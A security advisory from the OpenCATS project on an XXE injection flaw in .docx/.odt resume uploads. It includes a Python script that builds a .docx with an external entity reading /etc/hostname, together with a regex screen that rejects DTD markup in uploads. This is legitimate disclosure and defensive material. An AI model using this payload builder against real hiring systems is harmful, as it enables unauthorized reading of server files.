0.9.4 Security update
Urgent Security release
In response to an XML External Entity (XXE) injection vulnerability, we have released OpenCATS v0.9.4-3.
OpenCATS suffers from an unauthenticated XML external entity injection that allows remote users to read files on the underlying operating system.
Date Reported: 28 Jun 2019
OpenCats XML External Entity (XXE) Injection
Remote users (job applicants) can upload .docx or .odt files that cause the server to read files on the underlying operating system. The .docx case is described here, but .odt files work just as well, since both formats are parsed by the same vulnerable functions in DocumentToText.php.
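As an added example (not OpenCATS code, and not the reporter's proof of concept), the following Python builds a minimal .docx whose word/document.xml declares an external entity and references it from the document text: the shape of file that a text converter with entity substitution enabled would resolve. The target path, the part layout and the screening function are assumptions chosen for illustration. It also shows an upload-time screen that rejects any .docx or .odt XML part carrying a DOCTYPE or ENTITY declaration, and that Python's stdlib parser refuses the reference instead of fetching the file:

```python
"""Build an XXE test document (.docx) and screen uploads for DTD markup.

Added example, not OpenCATS code. The screen is an extra upload-time check;
it does not replace disabling entity substitution in the parser itself.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Assumed target file: something harmless for probing an instance you own.
XXE_TARGET = "file:///etc/hostname"

# Constructed payload: the entity is referenced from a text run, so a converter
# that substitutes external entities copies the file into the extracted text.
XXE_DOCUMENT_XML = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document [
  <!ENTITY xxe SYSTEM "{XXE_TARGET}">
]>
<w:document xmlns:w="{W_NS}">
  <w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body>
</w:document>
"""

# Constructed benign document with the same structure and no DTD.
BENIGN_DOCUMENT_XML = f"""<?xml version="1.0" encoding="UTF-8"?>
<w:document xmlns:w="{W_NS}">
  <w:body><w:p><w:r><w:t>hello</w:t></w:r></w:p></w:body>
</w:document>
"""

# Smallest part set that still looks like a Word package to most converters.
CONTENT_TYPES = """<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>
"""
RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>
"""


def build_docx(document_xml: str) -> bytes:
    """Zip the three parts into a .docx and return the archive bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", RELS)
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


DTD_MARKUP = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def _part_text(raw: bytes) -> str:
    # Parts are normally UTF-8; honour UTF-16 BOMs so re-encoding a part
    # cannot hide "<!DOCTYPE" from a byte-level search.
    for bom, enc in ((b"\xff\xfe", "utf-16-le"), (b"\xfe\xff", "utf-16-be")):
        if raw.startswith(bom):
            return raw[len(bom):].decode(enc, "replace")
    return raw.decode("utf-8", "replace")


def find_dtd_parts(doc_bytes: bytes) -> list:
    """Names of XML parts in a .docx or .odt that carry a DOCTYPE or ENTITY
    declaration. Neither format needs a DTD, so any hit is grounds to reject."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        for name in z.namelist():
            if name.lower().endswith((".xml", ".rels")):
                if DTD_MARKUP.search(_part_text(z.read(name))):
                    hits.append(name)
    return hits


def stdlib_text_extract(doc_bytes: bytes) -> str:
    """Concatenate w:t runs from word/document.xml. ElementTree never fetches
    external entities: &xxe; is an undefined entity to it, and parsing fails
    with ParseError instead of leaking the file."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    return "".join(t.text or "" for t in root.iter(f"{{{W_NS}}}t"))


def stdlib_refuses_xxe(doc_bytes: bytes) -> bool:
    """True when the stdlib parser rejects the document rather than expanding it."""
    try:
        stdlib_text_extract(doc_bytes)
    except ET.ParseError:
        return True
    return False


if __name__ == "__main__":
    evil = build_docx(XXE_DOCUMENT_XML)
    good = build_docx(BENIGN_DOCUMENT_XML)
    with open("xxe-test.docx", "wb") as f:  # upload only to an instance you own
        f.write(evil)
    print("DTD parts in test file:", find_dtd_parts(evil))        # ['word/document.xml']
    print("DTD parts in benign file:", find_dtd_parts(good))      # []
    print("stdlib parser refuses test file:", stdlib_refuses_xxe(evil))  # True
```

The same screen works for .odt uploads, since an .odt is also a zip of XML parts (content.xml instead of word/document.xml). Treat it as defence in depth only: the real fix is the one shipped in 0.9.4-3, namely that the parser behind DocumentToText.php must not resolve external entities at all.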
This problem has been fixed in version 0.9.4-3.
We recommend that you upgrade your OpenCATS instance as soon as possible.
If you wish to apply the fix manually instead, please view the changes, which require you to add a single line to /lib/DocumentToText.php.
We are extremely grateful to Mark Ruther for finding this vulnerability and notifying the OpenCATS project.
If you have any questions regarding this security fix, please visit the user support forums, or, if you have found an issue with the code, raise an issue on GitHub.